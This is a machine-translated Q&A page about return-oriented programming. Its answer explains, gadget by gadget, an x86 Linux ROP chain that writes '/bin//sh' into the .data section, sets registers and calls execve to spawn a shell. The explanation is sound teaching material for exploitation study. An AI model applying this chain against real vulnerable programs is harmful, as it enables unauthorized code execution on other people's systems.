通过面向返回的编程自动开发
我需要帮助了解此图片中的内容:
。
我没有看到@ .data指令与mov dword ptr [edx], eax结合使用的内容,特别是考虑到edx会立即弹出。
1 个答案:
答案 0 :(得分:0)
简而言之,@ .data行指的是用于写入"/bin//sh"字符串的可写内存,稍后执行该字符串。 .data部分只是可执行文件的可读/可写部分,加载到内存中,通常用于存储全局变量。
以下是ROP链如何运作的细分:
pop edx ; ret
@ .data
这两个小工具会将.data部分的地址弹出为edx。
pop eax ; ret
'/bin'
这些小工具会弹出0x6e69622f,或/bin//sh字符串的前四个字符变为eax
mov dword ptr [edx], eax ; ret
然后将eax的内容写入地址edx;此时,字符串的前四个字符已写在.data部分
pop edx ; ret
@ .data + 4
pop eax ; ret
'//sh'
mov dword ptr [edx], eax ; ret
这部分与写下字符串
的下四个字节完全相同pop edx ; ret
@ .data + 8
xor eax, eax ; ret
mov dword ptr [edx], eax ; ret
然后在字符串之后写入四个空字节以使其终止
pop ebx ; ret
@ .data
这将获取ebx
pop ecx ; pop ebx ; ret
@ .data + 8
padding without overwrite ebx
这会将.data+8写入ecx并将.data写入ebx。 (请注意,此处的第三行是0x080f4060,我们可以看到上面三行.data的地址相同)
pop edx ; ret
@ .data + 8
这会将.data+8写入edx
xor eax, eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
inc eax ; ret
这会将11写入eax
int 0x80
这将在Linux上执行系统调用。 Here是理解系统调用的绝佳资源。我们看到当eax为11(0xb)时,它是对execve的调用,其定义如下:
int execve(const char *filename, char *const argv[], char *const envp[]);
因此,ebx为filename,ecx为argv,edx为envp。此时,ebx指向字符串/bin//sh,ecx和edx都指向.data+8。它们都被视为字符串,但由于.data+8包含空字节,ecx和edx是空字符串。所以这个电话基本上是execve("/bin//sh", "", "");
相关问题
最新问题
- 我写了这段代码,但我无法理解我的错误
- 我无法从一个代码实例的列表中删除 None 值,但我可以在另一个实例中。为什么它适用于一个细分市场而不适用于另一个细分市场?
- 是否有可能使 loadstring 不可能等于打印?卢阿
- java中的random.expovariate()
- Appscript 通过会议在 Google 日历中发送电子邮件和创建活动
- 为什么我的 Onclick 箭头功能在 React 中不起作用?
- 在此代码中是否有使用“this”的替代方法?
- 在 SQL Server 和 PostgreSQL 上查询,我如何从第一个表获得第二个表的可视化
- 每千个数字得到
- 更新了城市边界 KML 文件的来源?